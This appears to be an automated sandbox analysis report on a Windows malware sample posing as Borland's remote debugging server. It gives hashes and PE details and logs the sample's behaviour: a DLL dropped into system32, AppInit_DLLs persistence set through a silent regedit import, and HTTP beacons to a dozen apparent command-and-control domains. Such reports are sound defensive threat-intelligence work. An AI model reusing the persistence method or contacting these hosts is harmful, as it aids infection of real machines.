Analysis Date: 2014-06-20 20:14:42
MD5: 0bcda7a0677feda57921a365ee36fc5a
SHA1: 01db27752ec64f6e7eaa81fb8d562dbb6b6f7be7

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 792baf13262e10490aec0865cdc01d26 sha1: c8464edf9eb5df9f61300186703a6605c5ee020e size: 90112
Section _ASM2 md5: 97f2ee690c601193ee15b7feb5420244 sha1: de7a2d8a5919212880fb99698b10421246d8e618 size: 62464
Section .rdata md5: 913d0084f4ed72645f74a09d33275529 sha1: 5f52630f45ae461a989b751761e3dbfb77fe789a size: 8192
Section .data md5: b2ab0093b3594d84da4a4b5c38de6104 sha1: d26c51d9a2862a5fc90bcd2c1f0247fd4dc3f1c3 size: 5120
Section .tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section .rsrc md5: 0700f6ce8a5c5f57f0abb43c0bfc0e28 sha1: 013ef4a4db6e77f6a2b3b73eb17e54ab68d4b788 size: 17920
Timestamp: 2012-09-17 04:33:23
Version
LegalCopyright: Copyright © Borland Software Corporation 1990, 2001
InternalName: BORDBG61
FileVersion: 70.08.08.1442
CompanyName: Borland Software Corporation
ProductName: Borland Remote Debugging Server
ProductVersion: 51.00
FileDescription: Borland Remote Debugging Server
OriginalFilename: bordbg61.exe
Packer: Microsoft Visual C++ ?.?
PEhash: ca671bb93c526fd66343d82a84d1ea904cdf3dcf
IMPhash: 7a869870f7ecafc77758c3c856dca578

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\Explorer.EXE

Registry: HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Creates File: C:\WINDOWS\system32\tpzfwxd.dll
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Cookies\cf
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process: C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNS: 91.233.89.106
Winsock DNS: clickbeta.ru
Winsock DNS: denadb.com
Winsock DNS: terrans.su
Winsock DNS: nsknock.com
Winsock DNS: tryatdns.com
Winsock DNS: clickclans.ru
Winsock DNS: denareclick.com
Winsock DNS: fescheck.com
Winsock DNS: instrango.com
Winsock DNS: tegimode.com
Winsock DNS: netrovad.com
Winsock DNS: nshouse1.com
Winsock DNS: foradns.com
Winsock DNS: getavodes.com
Winsock DNS: clickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\tpzfwxd.dll\\x00

Network Details:

HTTP GET: http://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1907&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/Wt0CBpNyQ83tzAC/Wy7OUTyhT8vybgFUy5d1av4q30
User-Agent:
HTTP GET: http://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1907&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/Wt0CBpNyQ83tzAC/Wy7OUTyhT8vybgFXAIv19684av
User-Agent:
HTTP GET: http://fescheck.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1907&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/Wt0CBpNyQ83tzAC/Wy7OUTyhT8vybgFZV9ICkLeApZ
User-Agent:
HTTP GET: http://instrango.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1907&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/Wt0CBpNyQ83tzAC/Wy7OUTyhT8vybgFae8jaumoKIW
User-Agent:
HTTP GET: http://nsknock.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1907&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/Wt0CBpNyQ83tzAC/Wy7OUTyhT8vybgFX0Ru3ub0v/f
User-Agent:
HTTP GET: http://tegimode.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1907&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/Wt0CBpNyQ83tzAC/Wy7OUTyhT8vybgFeGADdtQCu/8
User-Agent:
HTTP GET: http://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1907&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/Wt0CBpNyQ83tzAC/Wy7OUTyhT8vybgFcqdC5CdhLuy
User-Agent:
HTTP GET: http://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1907&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/Wt0CBpNyQ83tzAC/Wy7OUTyhT8vybgFecLi8e91jmJ
User-Agent:
HTTP GET: http://nshouse1.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1907&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/Wt0CBpNyQ83tzAC/Wy7OUTyhT8vybgFXEz7FmaMbYq
User-Agent:
HTTP GET: http://91.233.89.106/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1907&av=0&vm=0&al=0&p=39&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg/Wt0CBpNyQ83tzAC/Wy7OUTyhT8vybgFemhxMpm8S9L
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 208.73.211.240:80
Flows TCP: 192.168.1.1:1032 ➝ 208.73.211.246:80
Flows TCP: 192.168.1.1:1033 ➝ 208.73.210.210:80
Flows TCP: 192.168.1.1:1034 ➝ 91.237.88.245:80
Flows TCP: 192.168.1.1:1035 ➝ 208.73.210.219:80
Flows TCP: 192.168.1.1:1036 ➝ 208.73.210.205:80
Flows TCP: 192.168.1.1:1037 ➝ 208.73.211.173:80
Flows TCP: 192.168.1.1:1038 ➝ 208.73.211.193:80
Flows TCP: 192.168.1.1:1039 ➝ 208.73.210.219:80
Flows TCP: 192.168.1.1:1040 ➝ 91.233.89.106:80

Raw Pcap

Strings